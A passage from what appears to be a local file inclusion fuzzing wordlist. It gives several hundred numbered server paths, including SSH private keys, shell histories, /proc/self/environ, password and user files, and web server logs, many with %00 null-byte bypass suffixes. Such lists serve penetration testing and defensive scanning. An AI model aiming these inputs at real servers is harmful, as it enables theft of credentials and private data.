622 | /opt/xampp/logs/error_log 623 | /opt/xampp/logs/error.log 624 | \opt\xampp\logs\error_log 625 | \opt\xampp\logs\error.log 626 | /opt/xampp/logs/error_log%00 627 | /opt/xampp/logs/error.log%00 628 | /parameters.yml 629 | /php4/php.ini 630 | /php4\php.ini 631 | /php4\php.ini%00 632 | 
/php5/php.ini 633 | /php5\php.ini 634 | /php5\php.ini%00 635 | php://input 636 | /php/php.ini 637 | /php\php.ini 638 | /PHP\php.ini 639 | /php\php.ini%00 640 | /PHP\php.ini%00 641 | /postgresql/log/pgadmin.log 642 | /private/etc/httpd/apache2.conf 643 | /private/etc/httpd/apache.conf 644 | /private/etc/httpd/httpd.conf 645 | /private/etc/httpd/httpd.conf%00 646 | /private/etc/httpd/httpd.conf.default 647 | /private/etc/httpd/httpd.conf.default%00 648 | /private/etc/squirrelmail/config/config.php 649 | /private/tmp/[jboss]/server/default/conf/jboss-minimal.xml 650 | /private/tmp/[jboss]/server/default/conf/jboss-service.xml 651 | /private/tmp/[jboss]/server/default/conf/jndi.properties 652 | /private/tmp/[jboss]/server/default/conf/log4j.xml 653 | /private/tmp/[jboss]/server/default/conf/login-config.xml 654 | /private/tmp/[jboss]/server/default/conf/server.log.properties 655 | /private/tmp/[jboss]/server/default/conf/standardjaws.xml 656 | /private/tmp/[jboss]/server/default/conf/standardjboss.xml 657 | /private/tmp/[jboss]/server/default/deploy/jboss-logging.xml 658 | /private/tmp/[jboss]/server/default/log/boot.log 659 | /private/tmp/[jboss]/server/default/log/server.log 660 | /proc/cmdline 661 | /proc/cpuinfo 662 | /proc/devices 663 | /proc/meminfo 664 | /proc/net/tcp 665 | /proc/net/udp 666 | /proc/self/cmdline 667 | /proc/self/environ 668 | proc/self/environ 669 | /proc/self/fd/0 670 | /proc/self/fd/1 671 | /proc/self/fd/10 672 | /proc/self/fd/11 673 | /proc/self/fd/12 674 | /proc/self/fd/13 675 | /proc/self/fd/14 676 | /proc/self/fd/15 677 | /proc/self/fd/16 678 | /proc/self/fd/17 679 | /proc/self/fd/18 680 | /proc/self/fd/19 681 | /proc/self/fd/2 682 | /proc/self/fd/20 683 | /proc/self/fd/21 684 | /proc/self/fd/22 685 | /proc/self/fd/23 686 | /proc/self/fd/24 687 | /proc/self/fd/25 688 | /proc/self/fd/255 689 | /proc/self/fd/26 690 | /proc/self/fd/27 691 | /proc/self/fd/28 692 | /proc/self/fd/29 693 | /proc/self/fd/3 694 | /proc/self/fd/30 695 | 
/proc/self/fd/31 696 | /proc/self/fd/32 697 | /proc/self/fd/33 698 | /proc/self/fd/34 699 | /proc/self/fd/35 700 | /proc/self/fd/35/etc/passwd%00 701 | /proc/self/fd/4 702 | /proc/self/fd/5 703 | /proc/self/fd/6 704 | /proc/self/fd/7 705 | /proc/self/fd/8 706 | /proc/self/fd/9 707 | /proc/self/mounts 708 | /proc/self/stat 709 | /proc/self/status 710 | /proc/version 711 | /.profile 712 | .profile 713 | /program 714 | /Program Files\Apache Group\Apache2\conf\httpd.conf 715 | \Program Files\Apache Group\Apache2\conf\httpd.conf 716 | /Program Files\Apache Group\Apache2\conf\httpd.conf%00 717 | /Program Files\Apache Group\Apache\conf\httpd.conf 718 | \Program Files\Apache Group\Apache\conf\httpd.conf 719 | /Program Files\Apache Group\Apache\conf\httpd.conf%00 720 | /Program Files\Apache Group\Apache\logs\access.log 721 | \Program Files\Apache Group\Apache\logs\access.log 722 | /Program Files\Apache Group\Apache\logs\access.log%00 723 | /Program Files\Apache Group\Apache\logs\error.log 724 | \Program Files\Apache Group\Apache\logs\error.log 725 | /Program Files\Apache Group\Apache\logs\error.log%00 726 | /Program Files\xampp\apache\conf\httpd.conf 727 | /Program Files\xampp\apache\conf\httpd.conf%00 728 | \Program Files\xampp\apache\conf\httpd.confetc/passwd 729 | /.psql_history 730 | .psql_history 731 | /root/.bash_config 732 | /root/.bash_history 733 | /root/.bash_logout 734 | /root/.bashrc 735 | /root/.ksh_history 736 | /root/.xauthority 737 | /routing.yml 738 | /security.yml 739 | /services.yml 740 | /sftp-config.json 741 | .sh_history 742 | /sites/default/default.settings.php 743 | /sites/default/settings.php 744 | /.sqlite_history 745 | .sqlite_history 746 | /srv/www/htdos/squirrelmail/config/config.php 747 | /.ssh/authorized_keys 748 | .ssh/authorized_keys 749 | /.ssh/config 750 | .ssh/config 751 | /.ssh/id_dsa 752 | .ssh/id_dsa 753 | /.ssh/id_dsa.pub 754 | .ssh/id_dsa.pub 755 | /.ssh/identity 756 | .ssh/identity 757 | /.ssh/identity.pub 758 | .ssh/identity.pub 
759 | /.ssh/id_rsa 760 | .ssh/id_rsa 761 | /.ssh/id_rsa.pub 762 | .ssh/id_rsa.pub 763 | /.ssh/known_hosts 764 | .ssh/known_hosts 765 | /.subversion/servers 766 | .subversion/servers 767 | /system/library/webobjects/adaptors/apache2.2/apache.conf 768 | /.tconn/tconn.conf 769 | .tconn/tconn.conf 770 | /tmp/access.log 771 | /tmp/[jboss]/server/default/conf/jboss-minimal.xml 772 | /tmp/[jboss]/server/default/conf/jboss-service.xml 773 | /tmp/[jboss]/server/default/conf/jndi.properties 774 | /tmp/[jboss]/server/default/conf/log4j.xml 775 | /tmp/[jboss]/server/default/conf/login-config.xml 776 | /tmp/[jboss]/server/default/conf/server.log.properties 777 | /tmp/[jboss]/server/default/conf/standardjaws.xml 778 | /tmp/[jboss]/server/default/conf/standardjboss.xml 779 | /tmp/[jboss]/server/default/deploy/jboss-logging.xml 780 | /tmp/[jboss]/server/default/log/boot.log 781 | /tmp/[jboss]/server/default/log/server.log 782 | /tmp/sess_ 783 | /typo3conf/localconf.php 784 | /usr/apache2/conf/httpd.conf 785 | /usr/apache2/conf/httpd.conf%00 786 | /usr/apache/conf/httpd.conf 787 | /usr/apache/conf/httpd.conf%00 788 | /usr/etc/pure-ftpd.conf 789 | /usr/etc/pure-ftpd.conf%00 790 | /usr/home/user/lighttpd/lighttpd.conf 791 | /usr/home/user/var/log/apache.log 792 | /usr/home/user/var/log/lighttpd.error.log 793 | /usr/internet/pgsql/data/pg_hba.conf 794 | /usr/internet/pgsql/data/postmaster.log 795 | /usr/lib/cron/log 796 | /usr/lib/php.ini 797 | /usr/lib/php.ini%00 798 | /usr/lib/php/php.ini 799 | /usr/lib/php/php.ini%00 800 | /usr/lib/security/mkuser.default 801 | /usr/lib/security/mkuser.default%00 802 | /usr/local/apache1.3/conf/httpd.conf 803 | /usr/local/apache22/conf/httpd.conf 804 | /usr/local/apache22/httpd.conf 805 | /usr/local/apache2/apache2.conf 806 | /usr/local/apache2/apache.conf 807 | /usr/local/apache2/conf/apache2.conf 808 | /usr/local/apache2/conf/apache.conf 809 | /usr/local/apache2/conf/extra/httpd-ssl.conf 810 | /usr/local/apache2/conf/httpd.conf 811 | 
/usr/local/apache2/conf/httpd.conf%00 812 | /usr/local/apache2/conf/modsec.conf 813 | /usr/local/apache2/conf/ssl.conf 814 | /usr/local/apache2/conf/vhosts.conf 815 | /usr/local/apache2/conf/vhosts-custom.conf 816 | /usr/local/apache2/httpd.conf 817 | /usr/local/apache2/httpd.conf%00 818 | /usr/local/apache2/logs/access_log 819 | /usr/local/apache2/logs/access.log 820 | /usr/local/apache2/logs/access_log%00 821 | /usr/local/apache2/logs/access.log%00 822 | /usr/local/apache2/logs/audit_log 823 | /usr/local/apache2/logs/error_log 824 | /usr/local/apache2/logs/error.log 825 | /usr/local/apache2/logs/error_log%00 826 | /usr/local/apache2/logs/error.log%00 827 | /usr/local/apache2/logs/lighttpd.error.log 828 | /usr/local/apache2/logs/lighttpd.log 829 | /usr/local/apache/apache2.conf 830 | /usr/local/apache/apache.conf 831 | /usr/local/apache/conf/access.conf 832 | /usr/local/apache/conf/apache2.conf 833 | /usr/local/apache/conf/apache.conf 834 | /usr/local/apache/conf/httpd.conf 835 | /usr/local/apache/conf/httpd.conf%00 836 | /usr/local/apache/conf/httpd.conf.default 837 | /usr/local/apache/conf/modsec.conf 838 | /usr/local/apache/conf/php.ini 839 | /usr/local/apache/conf/php.ini%00 840 | /usr/local/apache/conf/vhosts.conf 841 | /usr/local/apache/conf/vhosts-custom.conf 842 | /usr/local/apache/httpd.conf 843 | /usr/local/apache/httpd.conf%00 844 | /usr/local/apache/logs/access_log 845 | /usr/local/apache/logs/access_log 846 | /usr/local/apache/logs/access.log 847 | /usr/local/apache/logs/access.log 848 | /usr/local/apache/logs/access_ log%00 849 | /usr/local/apache/logs/access_log%00 850 | /usr/local/apache/logs/access. 
log%00 851 | /usr/local/apache/logs/access.log%00 852 | /usr/local/apache/logs/audit_log 853 | /usr/local/apache/logs/error_log 854 | /usr/local/apache/logs/error_log 855 | /usr/local/apache/logs/error.log 856 | /usr/local/apache/logs/error.log 857 | /usr/local/apache/logs/error_log%00 858 | /usr/local/apache/logs/error.log%00 859 | /usr/local/apache/logs/lighttpd.error.log 860 | /usr/local/apache/logs/lighttpd.log 861 | /usr/local/apache/logs/mod_jk.log 862 | /usr/local/apps/apache22/conf/httpd.conf 863 | /usr/local/apps/apache2/conf/httpd.conf 864 | /usr/local/apps/apache2/conf/httpd.conf%00 865 | /usr/local/apps/apache/conf/httpd.conf 866 | /usr/local/apps/apache/conf/httpd.conf%00 867 | /usr/local/cpanel/logs 868 | /usr/local/cpanel/logs%00 869 | /usr/local/cpanel/logs/access_log 870 | /usr/local/cpanel/logs/access_log%00 871 | /usr/local/cpanel/logs/error_log 872 | /usr/local/cpanel/logs/error_log%00 873 | /usr/local/cpanel/logs/license_log 874 | /usr/local/cpanel/logs/license_log%00 875 | /usr/local/cpanel/logs/login_log 876 | /usr/local/cpanel/logs/login_log%00 877 | /usr/local/cpanel/logs/stats_log 878 | /usr/local/cpanel/logs/stats_log%00 879 | /usr/local/etc/apache22/conf/httpd.conf 880 | /usr/local/etc/apache22/httpd.conf 881 | /usr/local/etc/apache2/conf/httpd.conf 882 | /usr/local/etc/apache2/conf/httpd.conf%00 883 | /usr/local/etc/apache2/httpd.conf 884 | /usr/local/etc/apache2/vhosts.conf 885 | /usr/local/etc/apache/conf/httpd.conf 886 | /usr/local/etc/apache/conf/httpd.conf%00 887 | /usr/local/etc/apache/httpd.conf 888 | /usr/local/etc/apache/vhosts.conf 889 | /usr/local/etc/apache/vhosts.conf%00 890 | /usr/local/etc/httpd/conf 891 | /usr/local/etc/httpd/conf/httpd.conf 892 | /usr/local/etc/httpd/conf/httpd.conf%00 893 | /usr/local/etc/lighttpd.conf 894 | /usr/local/etc/lighttpd.conf.new 895 | /usr/local/etc/nginx/nginx.conf 896 | /usr/local/etc/php.ini 897 | /usr/local/etc/php.ini%00 898 | /usr/local/etc/pure-ftpd.conf 899 | 
/usr/local/etc/pure-ftpd.conf%00 900 | /usr/local/etc/pureftpd.pdb 901 | /usr/local/etc/pureftpd.pdb%00 902 | /usr/local/etc/smb.conf 903 | /usr/local/etc/webmin/miniserv.conf 904 | /usr/local/etc/webmin/miniserv.users 905 | /usr/local/httpd/conf/httpd.conf 906 | /usr/local/httpd/conf/httpd.conf%00 907 | /usr/local/jakarta/dist/tomcat/conf/context.xml 908 | /usr/local/jakarta/dist/tomcat/conf/jakarta.conf 909 | /usr/local/jakarta/dist/tomcat/conf/logging.properties 910 | /usr/local/jakarta/dist/tomcat/conf/server.xml 911 | /usr/local/jakarta/dist/tomcat/conf/workers.properties 912 | /usr/local/jakarta/dist/tomcat/logs/mod_jk.log 913 | /usr/local/jakarta/tomcat/conf/context.xml 914 | /usr/local/jakarta/tomcat/conf/jakarta.conf 915 | /usr/local/jakarta/tomcat/conf/logging.properties 916 | /usr/local/jakarta/tomcat/conf/server.xml 917 | /usr/local/jakarta/tomcat/conf/workers.properties 918 | /usr/local/jakarta/tomcat/logs/catalina.err 919 | /usr/local/jakarta/tomcat/logs/catalina.out 920 | /usr/local/jakarta/tomcat/logs/mod_jk.log 921 | /usr/local/[jboss]/server/default/conf/jboss-minimal.xml 922 | /usr/local/[jboss]/server/default/conf/jboss-service.xml 923 | /usr/local/[jboss]/server/default/conf/jndi.properties 924 | /usr/local/[jboss]/server/default/conf/log4j.xml 925 | /usr/local/[jboss]/server/default/conf/login-config.xml 926 | /usr/local/[jboss]/server/default/conf/server.log.properties 927 | /usr/local/[jboss]/server/default/conf/standardjaws.xml 928 | /usr/local/[jboss]/server/default/conf/standardjboss.xml 929 | /usr/local/[jboss]/server/default/deploy/jboss-logging.xml 930 | /usr/local/[jboss]/server/default/log/boot.log 931 | /usr/local/[jboss]/server/default/log/server.log 932 | /usr/local/lib/php.ini 933 | /usr/local/lib/php.ini%00 934 | /usr/local/lighttpd/conf/lighttpd.conf 935 | /usr/local/lighttpd/log/access.log 936 | /usr/local/lighttpd/log/lighttpd.error.log 937 | /usr/local/logs/access.log 938 | /usr/local/logs/samba.log 939 | 
/usr/local/lsws/conf/httpd_conf.xml 940 | /usr/local/lsws/logs/error.log 941 | /usr/local/mysql/data/{host}.err 942 | /usr/local/mysql/data/mysql-bin.index 943 | /usr/local/mysql/data/mysql-bin.log 944 | /usr/local/mysql/data/mysqlderror.log 945 | /usr/local/mysql/data/mysql.err 946 | /usr/local/mysql/data/mysql.log 947 | /usr/local/mysql/data/mysql-slow.log 948 | /usr/local/nginx/conf/nginx.conf 949 | /usr/local/pgsql/bin/pg_passwd 950 | /usr/local/pgsql/data/passwd 951 | /usr/local/pgsql/data/pg_hba.conf 952 | /usr/local/pgsql/data/pg_log 953 | /usr/local/pgsql/data/postgresql.conf 954 | /usr/local/pgsql/data/postgresql.log 955 | /usr/local/php4/apache2.conf 956 | /usr/local/php4/apache2.conf.php 957 | /usr/local/php4/apache.conf 958 | /usr/local/php4/apache.conf.php 959 | /usr/local/php4/httpd.conf 960 | /usr/local/php4/httpd.conf%00 961 | /usr/local/php4/httpd.conf.php 962 | /usr/local/php4/httpd.conf.php%00 963 | /usr/local/php4/lib/php.ini 964 | /usr/local/php4/lib/php.ini%00 965 | /usr/local/php5/apache2.conf 966 | /usr/local/php5/apache2.conf.php 967 | /usr/local/php5/apache.conf 968 | /usr/local/php5/apache.conf.php 969 | /usr/local/php5/httpd.conf 970 | /usr/local/php5/httpd.conf%00 971 | /usr/local/php5/httpd.conf.php 972 | /usr/local/php5/httpd.conf.php%00 973 | /usr/local/php5/lib/php.ini 974 | /usr/local/php5/lib/php.ini%00 975 | /usr/local/php/apache2.conf 976 | /usr/local/php/apache2.conf.php 977 | /usr/local/php/apache.conf 978 | /usr/local/php/apache.conf.php 979 | /usr/local/php/httpd.conf 980 | /usr/local/php/httpd.conf%00 981 | /usr/local/php/httpd.conf.php 982 | /usr/local/php/httpd.conf.php%00 983 | /usr/local/php/lib/php.ini 984 | /usr/local/php/lib/php.ini%00 985 | /usr/local/psa/admin/conf/php.ini 986 | /usr/local/psa/admin/conf/site_isolation_settings.ini 987 | /usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php 988 | /usr/local/psa/admin/logs/httpsd_access_log 989 | /usr/local/psa/admin/logs/panel.log 
990 | /usr/local/pureftpd/etc/pure-ftpd.conf 991 | /usr/local/pureftpd/etc/pure-ftpd.conf%00 992 | /usr/local/pureftpd/etc/pureftpd.pdb 993 | /usr/local/pureftpd/etc/pureftpd.pdb%00 994 | /usr/local/pureftpd/sbin/pure-config.pl 995 | /usr/local/pureftpd/sbin/pure-config.pl%00 996 | /usr/local/samba/lib/log.user 997 | /usr/local/samba/lib/smb.conf.user 998 | /usr/local/sb/config 999 | /usr/local/squirrelmail/www/readme 1000 | /usr/local/zend/etc/php.ini 1001 | /usr/local/Zend/etc/php.ini 1002 | /usr/local/Zend/etc/php.ini%00 1003 | /usr/local/zeus/web/global.cfg 1004 | /usr/local/zeus/web/log/errors 1005 | /usr/pkg/etc/httpd/httpd.conf 1006 | /usr/pkg/etc/httpd/httpd-default.conf 1007 | /usr/pkg/etc/httpd/httpd-vhosts.conf 1008 | /usr/pkgsrc/net/pureftpd/ 1009 | /usr/pkgsrc/net/pureftpd/%00 1010 | /usr/pkgsrc/net/pureftpd/pure-ftpd.conf 1011 | /usr/pkgsrc/net/pureftpd/pureftpd.passwd 1012 | /usr/pkgsrc/net/pureftpd/pureftpd.pdb 1013 | /usr/ports/contrib/pure-ftpd/ 1014 | /usr/ports/contrib/pure-ftpd/%00 1015 | /usr/ports/contrib/pure-ftpd/pure-ftpd.conf 1016 | /usr/ports/contrib/pure-ftpd/pureftpd.passwd 1017 | /usr/ports/contrib/pure-ftpd/pureftpd.pdb 1018 | /usr/ports/ftp/pure-ftpd/ 1019 | /usr/ports/ftp/pure-ftpd/%00 1020 | /usr/ports/ftp/pure-ftpd/pure-ftpd.conf 1021 | /usr/ports/ftp/pure-ftpd/pureftpd.passwd 1022 | /usr/ports/ftp/pure-ftpd/pureftpd.pdb 1023 | /usr/ports/net/pure-ftpd/ 1024 | /usr/ports/net/pure-ftpd/%00 1025 | /usr/ports/net/pure-ftpd/pure-ftpd.conf 1026 | /usr/ports/net/pure-ftpd/pureftpd.passwd 1027 | /usr/ports/net/pure-ftpd/pureftpd.pdb 1028 | /usr/sbin/mudlogd 1029 | /usr/sbin/mudpasswd 1030 | /usr/sbin/pure-config.pl 1031 | /usr/sbin/pure-config.pl%00 1032 | /usr/share/adduser/adduser.conf 1033 | /usr/share/logs/catalina.err 1034 | /usr/share/logs/catalina.out 1035 | /usr/share/squirrelmail/config/config.php 1036 | /usr/share/squirrelmail/plugins/squirrel_logger/setup.php 1037 | /usr/share/tomcat6/conf/context.xml 1038 | 
/usr/share/tomcat6/conf/logging.properties 1039 | /usr/share/tomcat6/conf/server.xml 1040 | /usr/share/tomcat6/conf/workers.properties 1041 | /usr/share/tomcat6/logs/catalina.err 1042 | /usr/share/tomcat6/logs/catalina.out 1043 | /usr/share/tomcat/logs/catalina.err 1044 | /usr/share/tomcat/logs/catalina.out 1045 | /usr/share/webshells/php/php-reverse-shell.php 1046 | /usr/spool/lp/log 1047 | /usr/spool/mqueue/syslog 1048 | /var/adm/acct/sum/loginlog 1049 | /var/adm/aculog 1050 | /var/adm/aculogs 1051 | /var/adm/crash/unix 1052 | /var/adm/crash/vmcore 1053 | /var/adm/cron/log 1054 | /var/adm/dtmp 1055 | /var/adm/lastlog 1056 | /var/adm/lastlog/username 1057 | /var/adm/log/asppp.log 1058 | /var/adm/loginlog 1059 | /var/adm/log/xferlog 1060 | /var/adm/log/xferlog%00 1061 | /var/adm/lp/lpd-errs 1062 | /var/adm/messages 1063 | /var/adm/messages.0 1064 | /var/adm/messages.1 1065 | /var/adm/messages.2 1066 | /var/adm/messages.3 1067 | /var/adm/pacct 1068 | /var/adm/qacct 1069 | /var/adm/ras/bootlog 1070 | /var/adm/ras/errlog 1071 | /var/adm/sulog 1072 | /var/adm/syslog 1073 | /var/adm/utmp 1074 | /var/adm/utmpx 1075 | /var/adm/vold.log 1076 | /var/adm/wtmp 1077 | /var/adm/wtmpx 1078 | /var/adm/x0msgs 1079 | /var/apache/conf/httpd.conf 1080 | /var/cpanel/cpanel.config 1081 | /var/cpanel/cpanel.config%00 1082 | /var/cpanel/tomcat.options 1083 | /var/cron/log 1084 | /var/data/mysql-bin.index 1085 | /var/db/shadow/hash 1086 | /var/lib/mysql/my.cnf 1087 | /var/lib/mysql/my.cnf%00 1088 | /var/lib/pgsql/data/postgresql.conf 1089 | /var/lib/php5/session/sess_ 1090 | /var/lib/php/session/sess_ 1091 | /var/lib/squirrelmail/prefs/squirrelmail.log 1092 | /var/lib/tomcat6/conf/tomcat-users.xml 1093 | /var/lib/tomcat7/conf/tomcat-users.xml 1094 | /var/lib/tomcat8/conf/tomcat-users.xml 1095 | /var/lighttpd.log 1096 | /var/local/www/conf/php.ini 1097 | /var/local/www/conf/php.ini%00 1098 | /var/log/access_log 1099 | /var/log/access_log 1100 | /var/log/access.log 1101 | 
/var/log/access.log 1102 | /var/log/access_log%00 1103 | /var/log/access.log%00 1104 | /var/log/apache2/access_log 1105 | /var/log/apache2/access_log 1106 | /var/log/apache2/access.log 1107 | /var/log/apache2/access.log 1108 | /var/log/apache2/access_log%00 1109 | /var/log/apache2/access.log%00 1110 | /var/log/apache2/error_log 1111 | /var/log/apache2/error_log 1112 | /var/log/apache2/error.log 1113 | /var/log/apache2/error.log 1114 | /var/log/apache2/error_log%00 1115 | /var/log/apache2/error.log%00 1116 | /var/log/apache2/squirrelmail.err.log 1117 | /var/log/apache2/squirrelmail.log 1118 | /var/log/apache/access_log 1119 | /var/log/apache/access_log 1120 | /var/log/apache/access.log 1121 | /var/log/apache/access.log 1122 | /var/log/apache/access_log%00 1123 | /var/log/apache/access.log%00 1124 | /var/log/apache/error_log 1125 | /var/log/apache/error_log 1126 | /var/log/apache/error.log 1127 | /var/log/apache/error.log 1128 | /var/log/apache/error_log%00 1129 | /var/log/apache/error.log%00 1130 | /var/log/authlog 1131 | /var/log/auth.log 1132 | /var/log/auth.log.0 1133 | /var/log/auth.log.0.gz 1134 | /var/log/auth.log.1 1135 | /var/log/auth.log.1.gz 1136 | /var/log/auth.log.2 1137 | /var/log/auth.log.2.gz 1138 | /var/log/auth.log.3 1139 | /var/log/auth.log.3.gz 1140 | /var/log/boot.log 1141 | /var/log/cron/var/log/postgres.log 1142 | /var/log/daemon.log 1143 | /var/log/daemon.log.1 1144 | /var/log/data/mysql-bin.index 1145 | /var/log/error_log 1146 | /var/log/error_log 1147 | /var/log/error.log 1148 | /var/log/error.log 1149 | /var/log/error_log%00 1150 | /var/log/error.log%00 1151 | /var/log/exim_mainlog 1152 | /var/log/exim/mainlog 1153 | /var/log/exim_mainlog%00 1154 | /var/log/exim/mainlog%00 1155 | /var/log/exim_paniclog 1156 | /var/log/exim/paniclog 1157 | /var/log/exim_paniclog%00 1158 | /var/log/exim/paniclog%00 1159 | /var/log/exim_rejectlog 1160 | /var/log/exim/rejectlog 1161 | /var/log/exim/rejectlog%00 1162 | /var/log/exim_rejectlog%00/etc/issue 1163 | 
/var/log/exim_rejectlog/etc/passwd 1164 | /var/log/ftplog 1165 | /var/log/ftplog%00 1166 | /var/log/ftp-proxy 1167 | /var/log/ftp-proxy%00 1168 | /var/log/ftp-proxy/ftp-proxy.log 1169 | /var/log/ftp-proxy/ftp-proxy.log%00 1170 | /var/log/httpd/access_log 1171 | /var/log/httpd/access.log 1172 | /var/log/httpd/access_log%00 1173 | /var/log/httpd/access.log%00 1174 | /var/log/httpd/error_log 1175 | /var/log/httpd/error.log 1176 | /var/log/httpd/error_log%00 1177 | /var/log/httpd/error.log%00 1178 | /var/log/ipfw 1179 | /var/log/ipfw/ipfw.log 1180 | /var/log/ipfw.log 1181 | /var/log/ipfw.today 1182 | /var/log/kernel.log 1183 | /var/log/kern.log 1184 | /var/log/kern.log.1 1185 | /var/log/lastlog 1186 | /var/log/lighttpd/ 1187 | /var/log/lighttpd/access.log 1188 | /var/log/lighttpd.access.log 1189 | /var/log/lighttpd/access.www.log 1190 | /var/log/lighttpd/{domain}/access.log 1191 | /var/log/lighttpd/{domain}/error.log 1192 | /var/log/lighttpd/error.log 1193 | /var/log/lighttpd.error.log 1194 | /var/log/lighttpd/error.www.log 1195 | /var/log/log.smb 1196 | /var/log/mail.err 1197 | /var/log/mail.info 1198 | /var/log/maillog 1199 | /var/log/mail.log 1200 | /var/log/maillog%00 1201 | /var/log/mail.warn 1202 | /var/log/messages 1203 | /var/log/messages.0 1204 | /var/log/messages.0.gz 1205 | /var/log/messages.1 1206 | /var/log/messages.1.gz 1207 | /var/log/messages.2 1208 | /var/log/messages.2.gz 1209 | /var/log/messages.3 1210 | /var/log/messages.3.gz 1211 | /var/log/messages.log 1212 | /var/log/muddleftpd 1213 | /var/log/muddleftpd.conf 1214 | /var/log/mysql-bin.index 1215 | /var/log/mysql/data/mysql-bin.index 1216 | /var/log/mysqlderror.log 1217 | /var/log/mysqlderror.log%00 1218 | /var/log/mysql.err 1219 | /var/log/mysql.log 1220 | /var/log/mysql.log%00 1221 | /var/log/mysql/mysql-bin.index 1222 | /var/log/mysql/mysql-bin.log 1223 | /var/log/mysql/mysql-bin.log%00 1224 | /var/log/mysql/mysql.log 1225 | /var/log/mysql/mysql.log%00 1226 | /var/log/mysql/mysql-slow.log 1227 
| /var/log/mysql/mysql-slow.log%00 1228 | /var/log/news.all 1229 | /var/log/news/news.all 1230 | /var/log/news/news.crit 1231 | /var/log/news/news.err 1232 | /var/log/news/news.notice 1233 | /var/log/news/suck.err 1234 | /var/log/news/suck.notice 1235 | /var/log/nginx/access_log 1236 | /var/log/nginx/access.log 1237 | /var/log/nginx.access_log 1238 | /var/log/nginx/error_log 1239 | /var/log/nginx/error.log 1240 | /var/log/nginx.error_log 1241 | /var/log/pgsql8.log 1242 | /var/log/pgsql_log 1243 | /var/log/pgsql/pgsql.log 1244 | /var/log/pm-powersave.log 1245 | /var/log/poplog 1246 | /var/log/postgres/pg_backup.log 1247 | /var/log/postgres/postgres.log 1248 | /var/log/postgresql.log 1249 | /var/log/postgresql/main.log 1250 | /var/log/postgresql/postgres.log 1251 | /var/log/postgresql/postgresql-8.1-main.log 1252 | /var/log/postgresql/postgresql-8.3-main.log 1253 | /var/log/postgresql/postgresql-8.4-main.log 1254 | /var/log/postgresql/postgresql-9.0-main.log 1255 | /var/log/postgresql/postgresql-9.1-main.log 1256 | /var/log/postgresql/postgresql.log 1257 | /var/log/proftpd 1258 | /var/log/proftpd%00 1259 | /var/log/proftpd.access_log 1260 | /var/log/proftpd.xferlog 1261 | /var/log/proftpd/xferlog.legacy 1262 | /var/log/pureftpd.log 1263 | /var/log/pureftpd.log%00 1264 | /var/log/pure-ftpd/pure-ftpd.log 1265 | /var/log/pure-ftpd/pure-ftpd.log%00 1266 | /var/logs/access.log 1267 | /var/log/samba.log 1268 | /var/log/samba.log1 1269 | /var/log/samba.log2 1270 | /var/log/samba/log.nmbd 1271 | /var/log/samba/log.smbd 1272 | /var/log/secure.log 1273 | /var/log/squirrelmail.log 1274 | /var/log/sso/sso.log 1275 | /var/log/sw-cp-server/error_log 1276 | /var/log/syslog 1277 | /var/log/syslog.0 1278 | /var/log/syslog.0.gz 1279 | /var/log/syslog.1 1280 | /var/log/syslog.1.gz 1281 | /var/log/syslog.2 1282 | /var/log/syslog.2.gz 1283 | /var/log/syslog.3 1284 | /var/log/syslog.3.gz 1285 | /var/log/syslog.log 1286 | /var/log/tomcat6/catalina.out 1287 | /var/log/ufw.log 1288 | 
/var/log/user.log 1289 | /var/log/user.log.1 1290 | /var/log/vmware/hostd-1.log 1291 | /var/log/vmware/hostd.log 1292 | /var/log/vsftpd.log 1293 | /var/log/vsftpd.log%00 1294 | /var/log/webmin/miniserv.log 1295 | /var/log/wtmp 1296 | /var/log/xferlog 1297 | /var/log/xferlog%00 1298 | /var/log/xorg.0.log 1299 | /var/lp/logs/lpnet 1300 | /var/lp/logs/lpsched 1301 | /var/lp/logs/requests 1302 | /var/mail/apache 1303 | /var/mail/nobody 1304 | /var/mail/www 1305 | /var/mail/www-data 1306 | /var/mysql-bin.index 1307 | /var/mysql.log 1308 | /var/mysql.log%00 1309 | /var/nm2/postgresql.conf 1310 | /var/postgresql/db/postgresql.conf 1311 | /var/postgresql/log/postgresql.log 1312 | /var/root/.bash_history 1313 | /var/root/.sh_history 1314 | /var/run/utmp 1315 | /var/saf/_log 1316 | /var/saf/port/log 1317 | /var/www/.bash_history 1318 | /var/www/conf 1319 | /var/www/conf/httpd.conf 1320 | /var/www/conf/httpd.conf%00 1321 | /var/www/config.php 1322 | /var/www/html/squirrelmail-1.2.9/config/config.php 1323 | /var/www/html/squirrelmail/config/config.php 1324 | /var/www/.lighttpdpassword 1325 | /var/www/logs/access_log 1326 | /var/www/logs/access_log 1327 | /var/www/logs/access.log 1328 | /var/www/logs/access.log 1329 | /var/www/logs/access_log%00 1330 | /var/www/logs/access.log%00 1331 | /var/www/logs/error_log 1332 | /var/www/logs/error_log 1333 | /var/www/logs/error.log 1334 | /var/www/logs/error.log 1335 | /var/www/logs/error_log%00 1336 | /var/www/logs/error.log%00 1337 | /var/www/mgr/logs/access_log 1338 | /var/www/mgr/logs/access.log 1339 | /var/www/mgr/logs/error_log 1340 | /var/www/mgr/logs/error.log 1341 | /var/www/squirrelmail/config/config.php 1342 | /.vidalia/vidalia.conf 1343 | .vidalia/vidalia.conf 1344 | /volumes/macintosh_hd1/opt/apache2/conf/httpd.conf 1345 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 1346 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00 1347 | /volumes/macintosh_hd1/opt/apache/conf/httpd.conf 1348 | 
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 1349 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00 1350 | /volumes/macintosh_hd1/opt/httpd/conf/httpd.conf 1351 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 1352 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00 1353 | /volumes/macintosh_hd1/usr/local/php4/httpd.conf.php 1354 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 1355 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00 1356 | /volumes/macintosh_hd1/usr/local/php5/httpd.conf.php 1357 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 1358 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00 1359 | /volumes/macintosh_hd1/usr/local/php/httpd.conf.php 1360 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 1361 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00 1362 | /volumes/macintosh_hd1/usr/local/php/lib/php.ini 1363 | 